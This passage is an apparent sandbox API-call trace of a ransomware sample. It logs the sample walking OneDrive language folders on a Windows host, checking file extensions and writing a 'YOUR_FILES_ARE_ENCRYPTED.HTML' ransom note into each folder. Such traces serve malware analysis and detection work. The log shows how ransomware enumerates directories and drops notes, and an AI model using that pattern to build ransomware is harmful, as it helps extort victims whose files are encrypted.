lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.598] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x838271cc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x838271cc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x838271cc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="hr", cAlternateFileName="")) returned 1 [0113.598] StrStrIW (lpFirst="hr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.598] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr") returned 78 [0113.598] GetProcessHeap () returned 0x600000 [0113.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.598] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr" [0113.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\*" [0113.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x838271cc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x838271cc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83a17039, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.599] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x838271cc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x838271cc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83a17039, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.599] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83a17039, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83a17039, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83aafb76, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.599] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.599] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.599] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.599] lstrlenW (lpString=".mui") returned 4 [0113.599] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.599] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83a17039, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83a17039, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83aafb76, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.599] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.599] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.599] GetProcessHeap () returned 0x600000 [0113.599] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\hr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.600] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.600] CloseHandle (hObject=0x330) returned 1 [0113.600] GetProcessHeap () returned 0x600000 [0113.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.601] GetProcessHeap () returned 0x600000 [0113.601] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.601] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83aafb76, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83aafb76, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83aafb76, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="hu", cAlternateFileName="")) returned 1 [0113.601] StrStrIW (lpFirst="hu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.601] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu") returned 78 [0113.601] GetProcessHeap () returned 0x600000 [0113.601] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.601] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu" [0113.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\*" [0113.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83aafb76, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83aafb76, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83eb5896, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.601] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83aafb76, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83aafb76, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83eb5896, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.601] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83eb5896, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83eb5896, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83f4e3ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.601] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.601] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.601] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.601] lstrlenW (lpString=".mui") returned 4 [0113.601] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.602] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83eb5896, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83eb5896, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83f4e3ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.602] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.602] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.602] GetProcessHeap () returned 0x600000 [0113.602] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.602] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.603] CloseHandle (hObject=0x330) returned 1 [0113.603] GetProcessHeap () returned 0x600000 [0113.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.603] GetProcessHeap () returned 0x600000 [0113.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.603] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83fc0aac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83fc0aac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83fc0aac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="hy", cAlternateFileName="")) returned 1 [0113.603] StrStrIW (lpFirst="hy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.603] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy") returned 78 [0113.603] GetProcessHeap () returned 0x600000 [0113.603] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.603] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy" [0113.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\*" [0113.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83fc0aac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83fc0aac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8418a6bc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.604] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83fc0aac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x83fc0aac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8418a6bc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.604] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8418a6bc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8418a6bc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84223144, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.604] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.604] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.604] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.604] lstrlenW (lpString=".mui") returned 4 [0113.604] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.604] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8418a6bc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8418a6bc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84223144, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14ec0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.604] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.604] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.604] GetProcessHeap () returned 0x600000 [0113.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\hy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.604] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.605] CloseHandle (hObject=0x330) returned 1 [0113.605] GetProcessHeap () returned 0x600000 [0113.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.605] GetProcessHeap () returned 0x600000 [0113.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.605] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x844390b4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x844390b4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x844390b4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="id", cAlternateFileName="")) returned 1 [0113.605] StrStrIW (lpFirst="id", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.605] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id") returned 78 [0113.605] GetProcessHeap () returned 0x600000 [0113.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.605] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id" [0113.605] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\*" [0113.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x844390b4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x844390b4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84675212, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x844390b4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x844390b4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84675212, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84675212, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84675212, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8470dd37, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.606] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.606] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.606] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.606] lstrlenW (lpString=".mui") returned 4 [0113.606] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84675212, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84675212, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8470dd37, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.606] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.606] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.606] GetProcessHeap () returned 0x600000 [0113.606] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\id\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.607] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.608] CloseHandle (hObject=0x330) returned 1 [0113.608] GetProcessHeap () returned 0x600000 [0113.608] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.608] GetProcessHeap () returned 0x600000 [0113.608] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.608] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8470dd37, 